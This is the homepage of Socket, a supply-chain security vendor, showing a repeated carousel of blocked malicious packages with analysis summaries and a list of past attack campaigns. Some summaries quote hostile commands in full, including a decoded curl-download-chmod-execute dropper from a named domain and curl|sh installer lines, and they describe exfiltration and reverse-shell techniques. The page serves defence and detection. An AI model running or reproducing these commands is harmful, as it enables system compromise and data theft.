Launch Week Day 5: Introducing Reachability for PHP.Learn More
Socket
Book a DemoSign in
Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Install GitHub App
Book a Demo

Questions? Call us at (844) SOCKET-0

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery
t

timmywil published 4.0.0

left-pad
s

stevemao published 1.3.0

react
r

react-bot published 19.2.5

We protect you from vulnerable and malicious packages

github.com/KubeOperator/kubepi

v1.1.3-0.20211104113339-d3fea441a3a0

Live on go

Blocked by Socket

The code effectively creates a remote terminal backdoor-like capability via gotty on macOS, with minimal visibility due to silent I/O and hard-coded paths. This is a high-security-risk pattern that warrants removal or strict hardening (authentication, access controls, non-root execution, dynamic path resolution, and explicit port management). A broader code review and deployment safeguards are strongly recommended.

worki

1.0.0

by h0x1-test

Removed from npm

Blocked by Socket

The file implements covert data exfiltration of environment variables via DNS queries to a hard-coded resolver IP (obscured with octal literals). This is malicious behavior (backdoor/data exfiltration). The module should be treated as compromised and not used. Immediate removal and investigation of affected systems and credentials is recommended.

Live on npm for 4 days, 12 hours and 47 minutes before removal. Socket users were protected even while the package was live.

@kui-shell/plugin-bash-like

0.24.0

by oliviaruan

Live on npm

Blocked by Socket

This module is a highly suspicious remote shell component. It exposes a WebSocket-controlled PTY running an interactive login Bash shell, where attacker-controlled network input (msg.cmdline and msg.data) is executed and the resulting terminal output is streamed back to the client. It also weakens TLS verification and performs macOS-specific bash session behavior manipulation. If reachable without strong external authorization controls, it represents a critical compromise risk (backdoor/remote command execution capability).

tailwindcss-animation-helper

1.1.8

by blaziystan

Live on npm

Blocked by Socket

This file uses the deprecated ‘request’ library to call `https://rest-icon-moduler.vercel[.]app/icons/777` (with a hardcoded header `bearrtoken: logo`), JSON-parses the response and immediately executes the `.credits` property via `eval()`. Worse, it invokes this fetch-and-eval routine at module load time (via `module.exports = { getPlugin: getPlugin() }`), so merely importing the file triggers arbitrary code execution. An attacker controlling the remote endpoint can run any JavaScript in the host process. Immediate remediation: remove all eval-based execution, eliminate network calls at import time, and apply strict validation or sandboxing of any dynamic code.

ais-dom

0.115.6b0

Live on pypi

Blocked by Socket

The code implements an automatic updater that sends detailed local identifiers and environment information to a hardcoded remote service, and crucially it accepts server-supplied scripts and packages which it writes to disk and executes without integrity checks or signing. That behavior allows arbitrary remote code execution and software replacement (including on Android via su/am), and untrusted network responses can directly drive local shell commands and package installations. While the functionality appears intended for legitimate updates, the lack of verification and the use of shell execution and privileged Android commands represent a significant supply-chain and remote-execution risk. Avoid using this module or ensure the updater endpoint and transport are fully trusted and protected; implement code-signing and strict validation before executing remote-provided artifacts.

hackpy

0.1.3

Live on pypi

Blocked by Socket

This code is malicious or part of a malicious toolkit. It includes credential harvesting (Chrome password recovery), remote-hosted binaries download and execution from a hardcoded attacker-controlled server, persistence via autorun, ability to disable system protections (UAC, Task Manager), and privacy-invasive features (webcam capture, clipboard access). Do not run or ship this package; treat it as high-risk malware. Further analysis of downloaded binaries (nircmd.exe, webcam.exe) and any network interactions with the hardcoded server are strongly recommended.

nerdwallet-blocks

2.0.1

by recon098

Removed from npm

Blocked by Socket

The code is malware that exfiltrates data through DNS queries to a suspicious domain, collects system information without consent, and communicates this data externally.

Live on npm for 22 hours and 10 minutes before removal. Socket users were protected even while the package was live.

bloodq

1

Live on pypi

Blocked by Socket

This code is largely a legitimate-looking build backend but contains several clear malicious or at-minimum suspicious constructs: an unguarded os.system shell chain that strips and packs the produced binary and moves it to a hardcoded '/sdcard/BLooD' path, an Arabic instruction message telling how to locate a file named NASR.py, use of upx to obfuscate the binary, and possible command injection risk due to unescaped shell interpolation. These actions are consistent with exfiltration and post-build payload staging (copying artifacts to removable storage and obfuscating them). Combined with the anomalous text and the hardcoded target, this indicates intentional malicious behavior in the module. I recommend not using this package and treating artifacts produced by it as suspicious. The file also contains syntax errors at the end, suggesting tampering or truncation; further corroboration with the published package version is needed.

ruzickap/action-my-broken-link-checker

8cf503c62c15051b611c8aff7a08df8f002005df

Live on actions

Blocked by Socket

This workflow presents a significant supply-chain risk: it executes code directly from repository documentation without validation or isolation. If an attacker can inject malicious bash blocks into README.md, they can cause arbitrary commands to run in CI, potentially compromising the build environment, leaking secrets, exfiltrating data, or installing malware. It is highly advisable to remove automatic execution of code blocks or implement strict vetting, sandboxing, or safe-guarded execution (e.g., running in a disposable container with restricted permissions and only whitelisted commands). Additionally, restrict PRs from triggering destructive or network-facing actions and consider requiring maintainer approval for code-block execution.

@levibostian/decaf-script-git

0.0.0

by levibostian

Live on npm

Blocked by Socket

This module is a highly suspicious installer/runner that performs immediate remote code execution using a curl|bash pipeline from a mutable GitHub HEAD URL without integrity verification or pinning. It then executes a local binary while forwarding untrusted CLI arguments through a shell-parsed execSync string, increasing the likelihood of command-parsing/injection issues. Treat this dependency as unsafe in a typical supply-chain context unless the remote installer and resulting binary are fully verified and pinned to immutable, integrity-checked artifacts.

aiges

0.9.0

Live on pypi

Blocked by Socket

This code exhibits multiple suspicious behaviors including API key mishandling, hardcoded suspicious WebSocket endpoints, and arbitrary network connectivity that could facilitate data theft or backdoor access. The pattern of collecting API keys then clearing them, combined with WebSocket communication to suspicious endpoints, strongly suggests malicious intent.

nwebclient

1.0.316

Live on pypi

Blocked by Socket

This module implements remote job fetching and execution primitives with dynamic class loading, web and MQTT interfaces, and multiple default network endpoints (notably hardcoded bsnx.net URLs). It does not appear obfuscated or explicitly destructive, but it provides many powerful remote-control and data-exfiltration capabilities without validation or sandboxing. If untrusted inputs or default endpoints are reachable, an attacker can cause arbitrary code to be imported and executed, files to be written, and internal Python objects to be exposed. Treat as high security risk and audit/lock configuration and network access before use.

driverless-acquisition-blue-auth-token-validator

0.5.0-0

by h1tester12332

Removed from npm

Blocked by Socket

The script collects information like the package name, directory, home directory, hostname, username, DNS servers and package JSON data, and sends it to a remote server.

Live on npm for 1 day, 22 hours and 7 minutes before removal. Socket users were protected even while the package was live.

354766/koatora20/guard-scanner/guard-scanner/

750b5c6c3b3a8021cc83d488def4b0a8b8a66e77

Live on socket

Blocked by Socket

This package is malicious or extremely high risk. The postinstall hook executes a remote script via curl|bash (direct remote code execution). The package also pulls a dependency via a git URL (non-registry source) and uses unpinned dependency specifiers. Do not install this package. Treat any systems that have installed it as compromised until you can audit them.

aspidites

1.5.2

Live on pypi

Blocked by Socket

The code implements a high-risk dynamic evaluation pattern by evaluating tokens within the caller’s scope. This creates a strong possibility of arbitrary code execution and data leakage if tokens originate from untrusted inputs. Hardening should include removing eval, replacing with safe resolvers, sandboxing, or strict token whitelisting and restricting scope access. This pattern is unsuitable for trusted libraries exposes in open-source supply chains without significant safeguards.

monolith-twirp-secretscanning-blobs

9999.9999.9999

by Ohio Schools R1 Admin

Live on rubygems

Blocked by Socket

This code collects system-identifying data (username, hostname, file path), hex-encodes it, constructs a domain under a hardcoded external base ('furb.pw') embedding that data into subdomain labels, and issues an HTTPS GET to that domain — a clear data-exfiltration pattern. The behavior is malicious or at minimum privacy-invasive telemetry sent to an external third party. The package should not be trusted or used without removal of the network exfiltration logic and a full audit.

@twork-data-services/proxy-prime-api-v6-customer-account-lite-info

1.99.0

by nikallass

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

354766/1nf-sh/skills/ai-rag-pipeline/

7e1fb7e75fa06d2526dcc700e8a342d9540c9344

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected The skill documentation itself describes legitimate RAG pipeline usage and its capabilities align with the stated purpose. I found no code-level malware, hardcoded secrets, or obfuscated backdoors in the provided content. However, there are operational supply-chain and privacy risks: it recommends running a remote installer with 'curl | sh', routes user queries and document contents through inference.sh and third-party app endpoints (potentially exposing sensitive data), and grants broad shell/infsh permissions. These behaviors are coherent with the tool's purpose but increase trust requirements. Recommend reviewing the infsh installer and operator privacy/persistence policies before use, avoid piping unknown install scripts, and ensure sensitive data is redacted before sending to remote extractors/LLMs. LLM verification: The SKILL.md serves as a functional guide for composing RAG pipelines using the inference.sh CLI and hosted third-party apps. The document contains operational security risks rather than code-level malware: notably the use of curl|sh installer pattern and the advice to forward raw extracted content to hosted LLM endpoints without redaction or credential-handling guidance. There is no evidence in the markdown of obfuscated code or embedded backdoors, but the installer pattern and centralized data

n8n-nodes-ggdv-hdfvcnnje-uyrokvbkl

0.0.38

by kakashi-hatake

Removed from npm

Blocked by Socket

The provided code fragment is heavily obfuscated but, in isolation, appears to implement a simple factory that returns a create-operation object when inputs satisfy certain conditions. There is no direct evidence in this snippet of malicious activity such as eval, network exfiltration, secret harvesting, or spawning processes. The obfuscation is concerning and warrants caution: the omitted parts of the module (the a27_0x... functions and other referenced variables) should be inspected to ensure they do not perform hidden network requests, decode and execute code, or read environment/credential data. Overall, the fragment is likely benign but the surrounding obfuscated code should be reviewed.

Live on npm for 5 hours and 57 minutes before removal. Socket users were protected even while the package was live.

ailever

0.2.416

Live on pypi

Blocked by Socket

The code presents a strong supply-chain and remote-execution risk by automatically downloading and executing remote Python payloads without integrity checks or sandboxing. It also creates and runs external services (Jupyter, Visdom, RStudio) based on user inputs, which can amplify impact if the remote payload is malicious. Mitigations include removing remote code execution paths, adding cryptographic verification (signatures or hash checks), isolating execution (sandboxes or containerization), validating inputs, and avoiding untrusted downloads or executions.

corio

2.0.17

Live on pypi

Blocked by Socket

The script contains a high-risk backdoor-like capability: when FMTR_DEV is enabled, it opens root SSH access with a hardcoded password, dumps environment data, and runs SSH in foreground with verbose logging. This undermines container isolation, enables remote compromise, and poses severe supply-chain security risks. It should be removed or replaced with secure, auditable behavior (e.g., disallow root SSH, use proper authentication via keys, avoid dumping environment, and validate inputs).

354766/inference-sh-6/skills/ai-podcast-creation/

8df5202816d8eaa20b95dbc5ae2bc8f9e9850fb6

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] This skill documentation is functionally consistent with its claimed purpose (AI podcast creation), but contains high-risk supply-chain and data-flow patterns: it instructs a curl | sh install of a remote CLI, routes user content and generated artifacts through hosted inference.sh endpoints, and chains multiple hosted services which could forward credentials or sensitive content. There is no explicit evidence of obfuscated malware or hardcoded secrets, so it does not appear to contain confirmed malware, but the download-and-execute pattern and centralized remote processing raise moderate-to-high security concerns. Recommend: avoid using the one-line curl|sh installation without manual verification; review infsh privacy/retention and authentication behavior; prefer pinned, auditable installs and understand who controls the hosted endpoints before uploading sensitive content. LLM verification: This skill is plausible and functionally aligned with its stated purpose (AI podcast creation). The main supply-chain/security concern is the recommended pipe-to-shell installer (curl -fsSL https://cli.inference.sh | sh) which downloads and executes remote code; even with published checksums, this pattern is high-risk. Additionally, the workflow routes all user scripts/documents to hosted inference apps (inference.sh/openrouter/etc.), which is expected for a hosted service but increases exposure

cl-lite

1.0.1177

by michael_tian

Live on npm

Blocked by Socket

This file is a blob of HTML/spam content with embedded links to adult videos, torrent downloads and suspicious redirectors (e.g. https://2023[.]redircdn[.]com/?…, http://rmdown[.]com/link[.]php?hash=…, http://data[.]down2048[.]com/list[.]php?…), plus numerous third-party image URLs. No executable code or proven malware payload is present, but the obfuscated redirects and torrent links pose a high risk of phishing, drive-by downloads or exposure to illicit content. Such anomalous content should be quarantined and removed from any legitimate software dependency.

github.com/bishopfox/sliver

v1.5.40-0.20241202233958-11dc6bac4d3b

Live on go

Blocked by Socket

This source is a network transport implementation for the Sliver C2 implant: it initializes encrypted sessions with a remote C2, polls for commands, and sends responses. It is intentionally designed for covert command-and-control and therefore represents malicious/backdoor behavior in a supply chain context. The code uses insecure math/rand for nonces and request randomization (crypto weakness). There are no hardcoded credentials or obvious obfuscation in this fragment, but templated values can insert configurable headers/paths and proxies at build/runtime. Recommendation: treat this package as malicious in context (implant) and do not include it in trusted software supply chains. If analyzing for defensive purposes, review use of cryptography, replace math/rand where cryptographic randomness is required, and carefully audit how options (proxy creds, host header) are supplied and stored.

bffhfuruhejfhdj

1.0.0

by testiui78777

Live on npm

Blocked by Socket

The code is a clear implementation of a reverse shell, posing a significant security risk by allowing remote command execution. It is not obfuscated, but its functionality is inherently malicious.

github.com/KubeOperator/kubepi

v1.1.3-0.20211104113339-d3fea441a3a0

Live on go

Blocked by Socket

The code effectively creates a remote terminal backdoor-like capability via gotty on macOS, with minimal visibility due to silent I/O and hard-coded paths. This is a high-security-risk pattern that warrants removal or strict hardening (authentication, access controls, non-root execution, dynamic path resolution, and explicit port management). A broader code review and deployment safeguards are strongly recommended.

worki

1.0.0

by h0x1-test

Removed from npm

Blocked by Socket

The file implements covert data exfiltration of environment variables via DNS queries to a hard-coded resolver IP (obscured with octal literals). This is malicious behavior (backdoor/data exfiltration). The module should be treated as compromised and not used. Immediate removal and investigation of affected systems and credentials is recommended.

Live on npm for 4 days, 12 hours and 47 minutes before removal. Socket users were protected even while the package was live.

@kui-shell/plugin-bash-like

0.24.0

by oliviaruan

Live on npm

Blocked by Socket

This module is a highly suspicious remote shell component. It exposes a WebSocket-controlled PTY running an interactive login Bash shell, where attacker-controlled network input (msg.cmdline and msg.data) is executed and the resulting terminal output is streamed back to the client. It also weakens TLS verification and performs macOS-specific bash session behavior manipulation. If reachable without strong external authorization controls, it represents a critical compromise risk (backdoor/remote command execution capability).

tailwindcss-animation-helper

1.1.8

by blaziystan

Live on npm

Blocked by Socket

This file uses the deprecated ‘request’ library to call `https://rest-icon-moduler.vercel[.]app/icons/777` (with a hardcoded header `bearrtoken: logo`), JSON-parses the response and immediately executes the `.credits` property via `eval()`. Worse, it invokes this fetch-and-eval routine at module load time (via `module.exports = { getPlugin: getPlugin() }`), so merely importing the file triggers arbitrary code execution. An attacker controlling the remote endpoint can run any JavaScript in the host process. Immediate remediation: remove all eval-based execution, eliminate network calls at import time, and apply strict validation or sandboxing of any dynamic code.

ais-dom

0.115.6b0

Live on pypi

Blocked by Socket

The code implements an automatic updater that sends detailed local identifiers and environment information to a hardcoded remote service, and crucially it accepts server-supplied scripts and packages which it writes to disk and executes without integrity checks or signing. That behavior allows arbitrary remote code execution and software replacement (including on Android via su/am), and untrusted network responses can directly drive local shell commands and package installations. While the functionality appears intended for legitimate updates, the lack of verification and the use of shell execution and privileged Android commands represent a significant supply-chain and remote-execution risk. Avoid using this module or ensure the updater endpoint and transport are fully trusted and protected; implement code-signing and strict validation before executing remote-provided artifacts.

hackpy

0.1.3

Live on pypi

Blocked by Socket

This code is malicious or part of a malicious toolkit. It includes credential harvesting (Chrome password recovery), remote-hosted binaries download and execution from a hardcoded attacker-controlled server, persistence via autorun, ability to disable system protections (UAC, Task Manager), and privacy-invasive features (webcam capture, clipboard access). Do not run or ship this package; treat it as high-risk malware. Further analysis of downloaded binaries (nircmd.exe, webcam.exe) and any network interactions with the hardcoded server are strongly recommended.

nerdwallet-blocks

2.0.1

by recon098

Removed from npm

Blocked by Socket

The code is malware that exfiltrates data through DNS queries to a suspicious domain, collects system information without consent, and communicates this data externally.

Live on npm for 22 hours and 10 minutes before removal. Socket users were protected even while the package was live.

bloodq

1

Live on pypi

Blocked by Socket

This code is largely a legitimate-looking build backend but contains several clear malicious or at-minimum suspicious constructs: an unguarded os.system shell chain that strips and packs the produced binary and moves it to a hardcoded '/sdcard/BLooD' path, an Arabic instruction message telling how to locate a file named NASR.py, use of upx to obfuscate the binary, and possible command injection risk due to unescaped shell interpolation. These actions are consistent with exfiltration and post-build payload staging (copying artifacts to removable storage and obfuscating them). Combined with the anomalous text and the hardcoded target, this indicates intentional malicious behavior in the module. I recommend not using this package and treating artifacts produced by it as suspicious. The file also contains syntax errors at the end, suggesting tampering or truncation; further corroboration with the published package version is needed.

ruzickap/action-my-broken-link-checker

8cf503c62c15051b611c8aff7a08df8f002005df

Live on actions

Blocked by Socket

This workflow presents a significant supply-chain risk: it executes code directly from repository documentation without validation or isolation. If an attacker can inject malicious bash blocks into README.md, they can cause arbitrary commands to run in CI, potentially compromising the build environment, leaking secrets, exfiltrating data, or installing malware. It is highly advisable to remove automatic execution of code blocks or implement strict vetting, sandboxing, or safe-guarded execution (e.g., running in a disposable container with restricted permissions and only whitelisted commands). Additionally, restrict PRs from triggering destructive or network-facing actions and consider requiring maintainer approval for code-block execution.

@levibostian/decaf-script-git

0.0.0

by levibostian

Live on npm

Blocked by Socket

This module is a highly suspicious installer/runner that performs immediate remote code execution using a curl|bash pipeline from a mutable GitHub HEAD URL without integrity verification or pinning. It then executes a local binary while forwarding untrusted CLI arguments through a shell-parsed execSync string, increasing the likelihood of command-parsing/injection issues. Treat this dependency as unsafe in a typical supply-chain context unless the remote installer and resulting binary are fully verified and pinned to immutable, integrity-checked artifacts.

aiges

0.9.0

Live on pypi

Blocked by Socket

This code exhibits multiple suspicious behaviors including API key mishandling, hardcoded suspicious WebSocket endpoints, and arbitrary network connectivity that could facilitate data theft or backdoor access. The pattern of collecting API keys then clearing them, combined with WebSocket communication to suspicious endpoints, strongly suggests malicious intent.

nwebclient

1.0.316

Live on pypi

Blocked by Socket

This module implements remote job fetching and execution primitives with dynamic class loading, web and MQTT interfaces, and multiple default network endpoints (notably hardcoded bsnx.net URLs). It does not appear obfuscated or explicitly destructive, but it provides many powerful remote-control and data-exfiltration capabilities without validation or sandboxing. If untrusted inputs or default endpoints are reachable, an attacker can cause arbitrary code to be imported and executed, files to be written, and internal Python objects to be exposed. Treat as high security risk and audit/lock configuration and network access before use.

driverless-acquisition-blue-auth-token-validator

0.5.0-0

by h1tester12332

Removed from npm

Blocked by Socket

The script collects information like the package name, directory, home directory, hostname, username, DNS servers and package JSON data, and sends it to a remote server.

Live on npm for 1 day, 22 hours and 7 minutes before removal. Socket users were protected even while the package was live.

354766/koatora20/guard-scanner/guard-scanner/

750b5c6c3b3a8021cc83d488def4b0a8b8a66e77

Live on socket

Blocked by Socket

This package is malicious or extremely high risk. The postinstall hook executes a remote script via curl|bash (direct remote code execution). The package also pulls a dependency via a git URL (non-registry source) and uses unpinned dependency specifiers. Do not install this package. Treat any systems that have installed it as compromised until you can audit them.

aspidites

1.5.2

Live on pypi

Blocked by Socket

The code implements a high-risk dynamic evaluation pattern by evaluating tokens within the caller’s scope. This creates a strong possibility of arbitrary code execution and data leakage if tokens originate from untrusted inputs. Hardening should include removing eval, replacing with safe resolvers, sandboxing, or strict token whitelisting and restricting scope access. This pattern is unsuitable for trusted libraries exposes in open-source supply chains without significant safeguards.

monolith-twirp-secretscanning-blobs

9999.9999.9999

by Ohio Schools R1 Admin

Live on rubygems

Blocked by Socket

This code collects system-identifying data (username, hostname, file path), hex-encodes it, constructs a domain under a hardcoded external base ('furb.pw') embedding that data into subdomain labels, and issues an HTTPS GET to that domain — a clear data-exfiltration pattern. The behavior is malicious or at minimum privacy-invasive telemetry sent to an external third party. The package should not be trusted or used without removal of the network exfiltration logic and a full audit.

@twork-data-services/proxy-prime-api-v6-customer-account-lite-info

1.99.0

by nikallass

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

354766/1nf-sh/skills/ai-rag-pipeline/

7e1fb7e75fa06d2526dcc700e8a342d9540c9344

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected The skill documentation itself describes legitimate RAG pipeline usage and its capabilities align with the stated purpose. I found no code-level malware, hardcoded secrets, or obfuscated backdoors in the provided content. However, there are operational supply-chain and privacy risks: it recommends running a remote installer with 'curl | sh', routes user queries and document contents through inference.sh and third-party app endpoints (potentially exposing sensitive data), and grants broad shell/infsh permissions. These behaviors are coherent with the tool's purpose but increase trust requirements. Recommend reviewing the infsh installer and operator privacy/persistence policies before use, avoid piping unknown install scripts, and ensure sensitive data is redacted before sending to remote extractors/LLMs. LLM verification: The SKILL.md serves as a functional guide for composing RAG pipelines using the inference.sh CLI and hosted third-party apps. The document contains operational security risks rather than code-level malware: notably the use of curl|sh installer pattern and the advice to forward raw extracted content to hosted LLM endpoints without redaction or credential-handling guidance. There is no evidence in the markdown of obfuscated code or embedded backdoors, but the installer pattern and centralized data

n8n-nodes-ggdv-hdfvcnnje-uyrokvbkl

0.0.38

by kakashi-hatake

Removed from npm

Blocked by Socket

The provided code fragment is heavily obfuscated but, in isolation, appears to implement a simple factory that returns a create-operation object when inputs satisfy certain conditions. There is no direct evidence in this snippet of malicious activity such as eval, network exfiltration, secret harvesting, or spawning processes. The obfuscation is concerning and warrants caution: the omitted parts of the module (the a27_0x... functions and other referenced variables) should be inspected to ensure they do not perform hidden network requests, decode and execute code, or read environment/credential data. Overall, the fragment is likely benign but the surrounding obfuscated code should be reviewed.

Live on npm for 5 hours and 57 minutes before removal. Socket users were protected even while the package was live.

ailever

0.2.416

Live on pypi

Blocked by Socket

The code presents a strong supply-chain and remote-execution risk by automatically downloading and executing remote Python payloads without integrity checks or sandboxing. It also creates and runs external services (Jupyter, Visdom, RStudio) based on user inputs, which can amplify impact if the remote payload is malicious. Mitigations include removing remote code execution paths, adding cryptographic verification (signatures or hash checks), isolating execution (sandboxes or containerization), validating inputs, and avoiding untrusted downloads or executions.

corio

2.0.17

Live on pypi

Blocked by Socket

The script contains a high-risk backdoor-like capability: when FMTR_DEV is enabled, it opens root SSH access with a hardcoded password, dumps environment data, and runs SSH in foreground with verbose logging. This undermines container isolation, enables remote compromise, and poses severe supply-chain security risks. It should be removed or replaced with secure, auditable behavior (e.g., disallow root SSH, use proper authentication via keys, avoid dumping environment, and validate inputs).

354766/inference-sh-6/skills/ai-podcast-creation/

8df5202816d8eaa20b95dbc5ae2bc8f9e9850fb6

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] This skill documentation is functionally consistent with its claimed purpose (AI podcast creation), but contains high-risk supply-chain and data-flow patterns: it instructs a curl | sh install of a remote CLI, routes user content and generated artifacts through hosted inference.sh endpoints, and chains multiple hosted services which could forward credentials or sensitive content. There is no explicit evidence of obfuscated malware or hardcoded secrets, so it does not appear to contain confirmed malware, but the download-and-execute pattern and centralized remote processing raise moderate-to-high security concerns. Recommend: avoid using the one-line curl|sh installation without manual verification; review infsh privacy/retention and authentication behavior; prefer pinned, auditable installs and understand who controls the hosted endpoints before uploading sensitive content. LLM verification: This skill is plausible and functionally aligned with its stated purpose (AI podcast creation). The main supply-chain/security concern is the recommended pipe-to-shell installer (curl -fsSL https://cli.inference.sh | sh) which downloads and executes remote code; even with published checksums, this pattern is high-risk. Additionally, the workflow routes all user scripts/documents to hosted inference apps (inference.sh/openrouter/etc.), which is expected for a hosted service but increases exposure

cl-lite

1.0.1177

by michael_tian

Live on npm

Blocked by Socket

This file is a blob of HTML/spam content with embedded links to adult videos, torrent downloads and suspicious redirectors (e.g. https://2023[.]redircdn[.]com/?…, http://rmdown[.]com/link[.]php?hash=…, http://data[.]down2048[.]com/list[.]php?…), plus numerous third-party image URLs. No executable code or proven malware payload is present, but the obfuscated redirects and torrent links pose a high risk of phishing, drive-by downloads or exposure to illicit content. Such anomalous content should be quarantined and removed from any legitimate software dependency.

github.com/bishopfox/sliver

v1.5.40-0.20241202233958-11dc6bac4d3b

Live on go

Blocked by Socket

This source is a network transport implementation for the Sliver C2 implant: it initializes encrypted sessions with a remote C2, polls for commands, and sends responses. It is intentionally designed for covert command-and-control and therefore represents malicious/backdoor behavior in a supply chain context. The code uses insecure math/rand for nonces and request randomization (crypto weakness). There are no hardcoded credentials or obvious obfuscation in this fragment, but templated values can insert configurable headers/paths and proxies at build/runtime. Recommendation: treat this package as malicious in context (implant) and do not include it in trusted software supply chains. If analyzing for defensive purposes, review use of cryptography, replace math/rand where cryptographic randomness is required, and carefully audit how options (proxy creds, host header) are supplied and stored.

bffhfuruhejfhdj

1.0.0

by testiui78777

Live on npm

Blocked by Socket

The code is a clear implementation of a reverse shell, posing a significant security risk by allowing remote command execution. It is not obfuscated, but its functionality is inherently malicious.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Git dependency

GitHub dependency

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

Telemetry

Protestware or potentially unwanted behavior

Unstable ownership

55 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

GitHub app screenshot

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Even more developer love
Install GitHub AppRead the docs

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Book a Demo

Questions? Call us at (844) SOCKET-0

Read the blog

Protect every package in your stack

Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.

View all integrations

RUST

crates.io

Rust Package Manager

PHP

Packagist

PHP Package Manager

GOLANG

Go Modules

Go Dependency Management

JAVA

Maven Central

JAVASCRIPT

npm

Node Package Manager

.NET

NuGet

.NET Package Manager

PYTHON

PyPI

Python Package Index

RUBY

RubyGems.org

Ruby Package Manager

SWIFT

Swift

AI

Hugging Face Hub

AI Model Hub

CI

GitHub Actions

CI/CD Workflows

EXTENSIONS

Chrome Web Store

Chrome Browser Extensions

EXTENSIONS

Open VSX

VS Code Extensions

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub App
Book a Demo

Questions? Call us at (844) SOCKET-0

The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles